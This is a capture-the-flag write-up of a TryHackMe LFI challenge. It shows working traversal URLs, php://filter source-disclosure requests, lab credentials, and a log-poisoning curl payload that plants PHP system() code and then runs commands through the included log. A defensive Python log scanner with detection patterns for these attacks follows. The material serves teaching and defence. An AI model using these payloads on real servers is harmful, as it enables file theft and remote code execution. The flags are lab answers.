[Day 6] Patch Management Is Hard

{Web Exploitation = LFI}


Last updated 3 years ago


Challenge

Accessing the webserver returns the following.

Inspecting the URL revealed that the application was invoking the error message from a given file.

Deploy the attached VM and look around. What is the entry point for our web application?

  • err

Replacing the error file name with a traversal path to /etc/passwd returned that file's contents, confirming the LFI vulnerability.

http://10.10.109.239/index.php?err=../../../../../etc/flag

Use the entry point to perform LFI to read the /etc/flag file. What is the flag?

  • THM{d29e08941cf7fe41df55f1a7da6c****}

Next, to get the source code of a particular file, I used the PHP filter method as shown below.

http://10.10.109.239/index.php?err=php://filter/convert.base64-encode/resource=index.php

Decoding the base64 value then led me to the next flag.

Use the PHP filter technique to read the source code of the index.php. What is the $flag variable's value?

  • THM{791d43d46018a0d89361dbf60d5d****}

In the source code, I noticed two referenced files: creds.php and manage.php.

manage.php redirects to login.php, which is where creds.php comes in handy. I used the same filter technique to read the contents of the creds.php file.

http://10.10.103.198/index.php?err=php://filter/convert.base64-encode/resource=./includes/creds.php
<?php
// Decoded contents of ./includes/creds.php
$USER = "McSkidy";
$PASS = "A0C315Aw3s0m";
?>

Now that you read the index.php, there is a login credential PHP file's path. Use the PHP filter technique to read its content. What are the username and password?

  • McSkidy:A0C315Aw3s0m

Logging into the Control System and accessing Password Recovery reveals the next flag.

Use the credentials to login into the web application. Help McSkidy to recover the server's password. What is the password of the flag.thm.aoc server?

  • THM{552f313b52e3c3dbf5257d8c6db7****}

Now that I had access to the logs, knew where the log file was located, and was able to write to it via web requests, I used the log poisoning method to get remote command execution on the system.

http://10.10.103.198/logs.php

I first poisoned the log by sending a request with curl and setting a PHP payload as the User-Agent, as shown below. Once the log line is included by the vulnerable page, the payload runs whatever command is supplied in the cmd parameter on the server.

curl -A '<?php system($_GET["cmd"]); ?>' http://10.10.103.198/login.php

Following that, I included the log file via the LFI and added a cmd parameter to the URL to run commands on the server.

http://10.10.103.198/index.php?err=./includes/logs/app_access.log&cmd=ls
http://10.10.103.198/index.php?err=./includes/logs/app_access.log&cmd=hostname

The web application logs all users' requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.

  • lfi-aoc-awesome-59aedca683fff9261263bb084880c965
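From the defender's side, every step of this chain leaves a trace in the same access log that was poisoned. Below is an added example of mine (not part of the writeup or the lab) that parses constructed combined-format log lines and flags the traversal, php:// wrapper, log-file include and PHP-in-User-Agent patterns seen above; the log format and sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines (combined log format), not taken from the lab; line 1 is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Dec/2021:10:00:01 +0000] "GET /index.php?err=error.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [06/Dec/2021:10:00:02 +0000] "GET /index.php?err=../../../../../etc/flag HTTP/1.1" 200 64 "-" "curl/7.68.0"
10.0.0.7 - - [06/Dec/2021:10:00:03 +0000] "GET /index.php?err=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 4096 "-" "curl/7.68.0"
10.0.0.7 - - [06/Dec/2021:10:00:04 +0000] "GET /login.php HTTP/1.1" 200 300 "-" "<?php system($_GET[\\"cmd\\"]); ?>"
10.0.0.7 - - [06/Dec/2021:10:00:05 +0000] "GET /index.php?err=./includes/logs/app_access.log&cmd=hostname HTTP/1.1" 200 2048 "-" "curl/7.68.0"
"""

# Combined log format; quoted fields may contain backslash-escaped quotes, as Apache writes them.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')          # ../ or ..\ after decoding
WRAPPER_RE = re.compile(r'^php://', re.I)        # php://filter used as an include target
LOGFILE_RE = re.compile(r'\.log$', re.I)         # a log file passed as the include target
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.I)     # PHP open tag inside a header that gets logged


def inspect_request(target, user_agent):
    """Return a list of findings for one request; an empty list means nothing suspicious."""
    findings = []
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            value = unquote(value)  # second decode catches %252e%252e/ style double encoding
            if TRAVERSAL_RE.search(value):
                findings.append(f"path traversal in parameter {name!r}")
            if WRAPPER_RE.match(value):
                findings.append(f"PHP stream wrapper in parameter {name!r}")
            if LOGFILE_RE.search(value):
                others = sorted(k for k in params if k != name)
                findings.append(f"log file included via {name!r}, other parameters: {others}")
    if PHP_TAG_RE.search(user_agent):
        findings.append("PHP code in User-Agent (log poisoning attempt)")
    return findings


def scan_log(text):
    # Parse each line and keep only requests that triggered at least one finding.
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these separately
        findings = inspect_request(m["target"], m["ua"])
        if findings:
            hits.append({"ip": m["ip"], "target": m["target"], "findings": findings})
    return hits
```

Running scan_log(SAMPLE_LOG) flags lines 2 to 5 and leaves the benign first request alone; the poisoning request itself is only visible through the User-Agent rule, which is why header fields deserve the same scrutiny as the query string.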
